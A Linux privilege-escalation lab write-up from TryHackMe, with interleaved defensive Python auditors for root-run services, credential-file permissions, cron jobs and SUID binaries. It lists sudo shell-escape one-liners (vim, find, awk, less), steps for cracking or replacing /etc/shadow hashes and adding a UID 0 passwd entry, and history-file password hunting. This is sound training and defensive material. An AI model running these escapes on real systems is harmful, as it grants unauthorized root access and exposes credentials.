Linux Privilege Escalation
Tib3rius Linux Privilege Escalation course from TryHackMe (with some overlap from TCM's arena)
TryHackMe – Linux PrivEsc Write-Up
topics: Linux Privilege Escalation, post exploitation (looting)
Service Exploits
File Permissions
Sudo Bypass
Cron Jobs
SUID/SGID Executables
Passwords & Keys
NFS
Kernel Exploits
new tools: unixprivesc, LinPrivchecker, strace, perl, env, function, export, mount
tools: nmapAutomator, nc, gcc, strings, enum4linux, LinPEAS, LinEnum, LSE, chmod, touch, find, msfvenom
Overview of Linux Privilege Escalation
As with any operating system, there are numerous ways to take advantage of system processes, configuration files, outdated kernel versions, OS-specific vulnerabilities, etc.
This write-up covers the specific techniques mentioned in the room, plus the generalisations and commonalities between them.
Helpful links and PDFs: the Linux Pocket Guide and other sources such as the Arch Wiki and open-source books.
Cheatsheets
Service Exploits
ps -elf | grep root
lists all services and processes run by root
If we examine the MySQL process's command line closely, we can see that MySQL is running as the root user without a password defined, so commands run through the service execute as root.
This information was taken from a known searchsploit exploit and is one of many examples of abusing services run as root.
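As an added example (not from the room or this write-up), the check below is the defender's counterpart of ps -elf | grep root: it parses the ps output and flags daemons such as mysqld that are owned by root instead of their dedicated service account. The sample process listing and the set of daemons in SERVICE_ACCOUNT_DAEMONS are constructed assumptions for the example.

```python
import os
import subprocess

# Daemons that should normally run under their own unprivileged account.
# Assumption for this example: extend the set for your own environment.
SERVICE_ACCOUNT_DAEMONS = {"mysqld", "mariadbd", "postgres", "nginx",
                           "apache2", "httpd", "redis-server"}

# Constructed sample of `ps -elf` output: one mysqld started as root
# (here with --user=root), one running under the mysql account.
SAMPLE_PS_ELF = """\
F S UID        PID  PPID  C PRI  NI ADDR SZ WCHAN  STIME TTY          TIME CMD
4 S root         1     0  0  80   0 -  9347 -      09:00 ?        00:00:01 /sbin/init
4 S root       612     1  0  80   0 - 32415 -      09:00 ?        00:00:03 /usr/sbin/mysqld --user=root
4 S mysql      613     1  0  80   0 - 32415 -      09:00 ?        00:00:03 /usr/sbin/mysqld
4 S root       700     1  0  80   0 -  1234 -      09:00 ?        00:00:00 /usr/sbin/cron
4 S www-data   801   700  0  80   0 -  5678 -      09:00 ?        00:00:00 /usr/sbin/apache2 -k start
"""


def parse_ps_elf(text):
    """Turn `ps -elf` rows into (uid, pid, cmdline) tuples. CMD is the 15th
    column and may contain spaces, so the split is capped at 14 separators."""
    rows = []
    for line in text.splitlines():
        parts = line.split(None, 14)
        if len(parts) < 15 or parts[0] == "F":   # header or truncated row
            continue
        rows.append((parts[2], int(parts[3]), parts[14]))
    return rows


def root_service_daemons(rows, daemons=SERVICE_ACCOUNT_DAEMONS):
    """(pid, cmdline) of root-owned processes whose executable name is one of
    the daemons expected to run as a service account."""
    hits = []
    for uid, pid, cmd in rows:
        exe = os.path.basename(cmd.split()[0])
        if uid == "root" and exe in daemons:
            hits.append((pid, cmd))
    return hits


def audit_text(text=SAMPLE_PS_ELF):
    """Run the check over a block of ps output (defaults to the sample)."""
    return root_service_daemons(parse_ps_elf(text))


def live_audit():
    """The same check against the running host."""
    out = subprocess.run(["ps", "-elf"], capture_output=True,
                         text=True, check=True).stdout
    return audit_text(out)


if __name__ == "__main__":
    for pid, cmd in audit_text():
        print(f"root-owned service daemon pid={pid}: {cmd}")
```

A hit is not proof of a vulnerability, only a process to look at: the fix is to start the daemon under its service account (and, for MySQL, set a password) rather than to rely on the process listing alone.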
Weak File Permissions
/etc/shadow
This file holds the hashed passwords of every user on the system, including root. If it is readable or writable by an ordinary user, any password hash can be read (and cracked) or replaced.
We can check our permissions with ls -la /etc/shadow
So we have read/write permissions for the file. We can view all password hashes and even change them. Let's read the file, store it in a text file and crack it with john.
Read
Write
We can make a new password hash using the $6$ type (SHA-512), which we can identify by googling the prefix or with hash-identifier. Use mkpasswd and input the new password.
/etc/passwd
This is the file that lists all system users and their UIDs, as well as each user's home folder and default shell.
Checking permissions with ls -la /etc/passwd
We have read/write permissions for the user file. We can generate a new password hash and replace the x (the password field) in the passwd file.
We can also copy root's entry and create a user newroot as an alias of root.
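As an added example (not the room's or the write-up's own code), the script below is the defensive check for both files above: it reports /etc/shadow or /etc/passwd modes that let non-root users read or write them, names the hash scheme from its prefix ($6$ = SHA-512), and scans passwd entries for a second UID 0 account or a hash placed directly in the password field instead of x. The passwd lines and the hash in them are constructed placeholders.

```python
import os
import stat
import tempfile

# crypt(3) scheme prefixes seen in the password field of /etc/shadow
HASH_SCHEMES = {"$1$": "md5", "$5$": "sha-256", "$6$": "sha-512",
                "$y$": "yescrypt", "$2b$": "bcrypt", "$2y$": "bcrypt"}


def hash_scheme(field):
    """Name the hashing scheme of a password field ($6$ is SHA-512)."""
    if field == "":
        return "empty"
    if field in ("*", "!") or field.startswith("!"):
        return "locked"
    for prefix, name in HASH_SCHEMES.items():
        if field.startswith(prefix):
            return name
    return "unknown"


def permission_findings(path, mode):
    """Findings for the mode bits of a credentials file: shadow must not be
    readable or writable by others; passwd is world-readable by design but
    must never be writable by group or others."""
    findings = []
    bits = oct(stat.S_IMODE(mode))
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append(f"{path}: writable by group or others ({bits})")
    if os.path.basename(path) == "shadow" and mode & stat.S_IROTH:
        findings.append(f"{path}: readable by others ({bits})")
    return findings


def audit_file(path):
    """Stat a real file and return its permission findings."""
    return permission_findings(path, os.stat(path).st_mode)


def passwd_findings(lines):
    """Findings for /etc/passwd content: extra UID 0 accounts (a copied root
    entry) and hashes stored in passwd instead of the 'x' pointer to shadow."""
    findings = []
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append(f"malformed entry: {line}")
            continue
        user, pw, uid = fields[0], fields[1], fields[2]
        if uid == "0" and user != "root":
            findings.append(f"{user}: extra UID 0 account")
        if pw == "":
            findings.append(f"{user}: empty password field")
        elif pw != "x":
            findings.append(f"{user}: hash stored in passwd ({hash_scheme(pw)})")
    return findings


# Constructed sample passwd lines; the $6$ value is a placeholder, not a real hash
SAMPLE_PASSWD = [
    "root:x:0:0:root:/root:/bin/bash",
    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin",
    "newroot:$6$constructedsalt$constructedhash:0:0:root:/root:/bin/bash",
    "user:x:1000:1000:user:/home/user:/bin/bash",
]


def demo_permission_check(mode):
    """Audit a temporary file named 'shadow' created with the given mode, so the
    permission check can be exercised without touching the real /etc/shadow."""
    d = tempfile.mkdtemp()
    p = os.path.join(d, "shadow")
    open(p, "w").close()
    os.chmod(p, mode)
    try:
        return audit_file(p)
    finally:
        os.remove(p)
        os.rmdir(d)


if __name__ == "__main__":
    for path in ("/etc/passwd", "/etc/shadow"):
        print(path, audit_file(path) or "ok")
    with open("/etc/passwd") as f:
        print(passwd_findings(f) or "passwd ok")
    print(demo_permission_check(0o666))
```

The expected state is /etc/shadow at 640 root:shadow (or 600) and /etc/passwd at 644; anything reported by audit_file is what the ls -la checks above would reveal to an attacker.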
Bypass Sudo
Shell Escape Sequences
GTFOBins is a collection of sudo, SUID and other bypass techniques that can be used on Linux.
sudo -l
lists all commands the user can use with sudo permissions
We can become root by:
vim: sudo vim followed by :!bash (can also edit the sudoers file to include all)
nmap: sudo nmap --interactive followed by !sh
iftop: sudo iftop followed by shift+! and Command> /bin/sh
find: sudo find . -exec /bin/sh \; -quit
nano: sudo nano, then ctrl+R ctrl+X, reset; sh 1>&0 2>&0. Didn't work on this box but you can just edit the sudoers file.
man: sudo man man followed by !/bin/sh
awk: sudo awk 'BEGIN {system("/bin/sh")}'
less: sudo less /etc/profile followed by !/bin/sh
ftp: sudo ftp followed by !/bin/sh
more: TERM= sudo more /etc/profile followed by !/bin/sh
The list is almost endless.
Environment Variables
Cron Jobs
Cron jobs are programs or scripts which users can schedule to run at specific times or intervals. Cron table files (crontabs) store the configuration for cron jobs. The system-wide crontab is located at /etc/crontab.
Useful commands:
File Permissions
View system-wide cron tables: cat /etc/crontab
PATH Environment Variable
cat /etc/crontab
Wildcards
cat /etc/crontab && cat /usr/local/bin/compress.sh
The tar command is being used with a wildcard *
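As an added example (not code from the room or this write-up), the audit below covers the three cron checks in one pass over a system crontab: a user-writable directory listed early in PATH, a root job that names its script without an absolute path, a root job whose script file is writable, and a script that runs tar with a bare *. The crontab, the compress.sh contents and the writable-path predicate are constructed for the example; on a real host the predicate would be os.access(path, os.W_OK).

```python
import os
import re
import shlex

CRON_ENV = re.compile(r"^([A-Za-z_][A-Za-z0-9_]*)=(.*)$")
SHELL_BUILTINS = {"cd", "export", "umask", "set"}   # not resolved via PATH


def parse_crontab(text):
    """Split a system crontab into variable assignments and
    (schedule, user, command) jobs; comments and blank lines are skipped."""
    env, jobs = {}, []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = CRON_ENV.match(line)
        if m:
            env[m.group(1)] = m.group(2).strip().strip('"')
            continue
        parts = line.split(None, 6)          # 5 schedule fields, user, command
        if len(parts) == 7:
            jobs.append((" ".join(parts[:5]), parts[5], parts[6]))
    return env, jobs


def first_word(cmd):
    """The program a job command starts with."""
    try:
        return shlex.split(cmd)[0]
    except (ValueError, IndexError):
        return cmd.split()[0] if cmd.split() else ""


def unqualified_commands(jobs):
    """Jobs whose program is resolved through PATH instead of an absolute path."""
    return [(user, first_word(cmd)) for _, user, cmd in jobs
            if "/" not in first_word(cmd) and first_word(cmd) not in SHELL_BUILTINS]


def writable_path_dirs(path_value, writable):
    """PATH entries the predicate reports as writable. Earlier entries win the
    lookup, so a writable directory listed first can shadow a real command."""
    return [d for d in path_value.split(":") if d and writable(d)]


def wildcard_tar_lines(script_text):
    """Script lines that call tar with a bare * argument, where file names in
    the directory get expanded into tar's own options."""
    hits = []
    for line in script_text.splitlines():
        try:
            toks = shlex.split(line)
        except ValueError:
            continue
        if toks and os.path.basename(toks[0]) == "tar" and any(
                t == "*" or t.endswith("/*") for t in toks[1:]):
            hits.append(line.strip())
    return hits


def audit_crontab(text, scripts, writable):
    """scripts maps absolute script paths named in jobs to their contents;
    writable(path) says whether an unprivileged user can write that path."""
    env, jobs = parse_crontab(text)
    report = {"writable_path_dirs": writable_path_dirs(env.get("PATH", ""), writable),
              "unqualified": unqualified_commands(jobs),
              "writable_scripts": [], "wildcard_tar": {}}
    for _, _, cmd in jobs:
        prog = first_word(cmd)
        if prog.startswith("/") and writable(prog):
            report["writable_scripts"].append(prog)
        if prog in scripts and wildcard_tar_lines(scripts[prog]):
            report["wildcard_tar"][prog] = wildcard_tar_lines(scripts[prog])
    return report


# Constructed sample: a user-writable directory first in PATH, a job named
# without a path, and a backup script that runs tar with *
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
* * * * * root backup.sh
* * * * * root /usr/local/bin/compress.sh
"""
SAMPLE_COMPRESS_SH = "#!/bin/sh\ncd /home/user\ntar czf /tmp/backup.tar.gz *\n"


def demo():
    """Audit the sample; the predicate stands in for os.access so the result
    does not depend on the permissions of the host running the example."""
    return audit_crontab(SAMPLE_CRONTAB,
                         {"/usr/local/bin/compress.sh": SAMPLE_COMPRESS_SH},
                         lambda p: p in {"/home/user", "/usr/local/bin/compress.sh"})


if __name__ == "__main__":
    print(demo())
```

Each finding maps to a fix: drop user-writable directories from the crontab PATH, call scripts by absolute path, make root's cron scripts root-owned and 755 or stricter, and pass tar an explicit directory (or use -- before the file list) instead of a bare *.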
SUID/SGID Executables
An SUID executable is a file that lets a user execute it with the permissions of the file owner; an SGID executable is the same except with the group owner. If the owner is root, we can essentially run the file with root permissions.
Known Exploits
find / -perm /4000 -type f -exec ls -ld {} \; 2>/dev/null
find all SUID files
find / -perm -g=s -type f 2>/dev/null
find all SGID files
SUID file misconfigurations can be found on GTFOBins
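As an added example (not from the room or the write-up), the script below does from the defender's side what the two find commands above do from the attacker's: it enumerates SUID/SGID regular files and reports the ones not in a known-good baseline, each with its bit type and whether root owns it, so they can be reviewed against GTFOBins or stripped of the bit. The baseline and the sample entries are constructed assumptions.

```python
import os
import stat


def suid_sgid_type(mode):
    """'suid', 'sgid' or 'suid+sgid' for a regular file's stat mode, else None."""
    if not stat.S_ISREG(mode):
        return None
    flags = []
    if mode & stat.S_ISUID:
        flags.append("suid")
    if mode & stat.S_ISGID:
        flags.append("sgid")
    return "+".join(flags) or None


def scan_tree(root="/"):
    """Yield (path, mode, uid) for every SUID/SGID regular file under root,
    the same files the find commands above list; unreadable directories are
    skipped instead of aborting the scan."""
    for dirpath, _, filenames in os.walk(root, onerror=lambda e: None):
        for name in filenames:
            p = os.path.join(dirpath, name)
            try:
                st = os.lstat(p)
            except OSError:
                continue
            if suid_sgid_type(st.st_mode):
                yield p, st.st_mode, st.st_uid


# Constructed baseline of paths expected to carry the bit on this host.
# Assumption for the example: derive the real one from a known-good image.
BASELINE = {"/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/su",
            "/usr/bin/mount", "/usr/bin/umount"}


def unexpected_entries(entries, baseline=BASELINE):
    """(path, type, root_owned) for entries outside the baseline. Each is a
    candidate for review and for chmod u-s / chmod g-s if the bit is unneeded."""
    return sorted((p, suid_sgid_type(m), uid == 0)
                  for p, m, uid in entries if p not in baseline)


# Constructed sample in the shape scan_tree yields
SAMPLE_ENTRIES = [
    ("/usr/bin/passwd", 0o104755, 0),
    ("/usr/bin/sudo", 0o104755, 0),
    ("/usr/local/bin/custom-helper", 0o104755, 0),   # root-owned custom setuid binary
    ("/usr/bin/wall", 0o102755, 0),                  # setgid tty
]


if __name__ == "__main__":
    for path, kind, is_root in unexpected_entries(SAMPLE_ENTRIES):
        print(f"{kind:10} root-owned={is_root} {path}")
    # on a real host: unexpected_entries(scan_tree("/"))
```

Run it from a baseline captured at build time and diff the output over time; a new root-owned entry outside the baseline is the finding worth raising.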
Shared Object Injection
Environment Variables
Exploiting Shell Features
The following doesn't work for bash versions 4.4+ (check with /bin/bash --version).
Passwords & Keys
History Files
cat ~/.*history | less
Configuration Files
SSH Keys
NFS
Kernel Exploits
Privilege Escalation Scripts
There are numerous enumeration scripts we can use. Linux shell scripts use the file extension .sh, so we can search for these first.
Find any file type using find . -type f -name '*.<FILETYPE>'
LinEnum
LinPEAS
LSE
Linux Exploit Suggester 2
Unix PrivEsc
Linux PrivChecker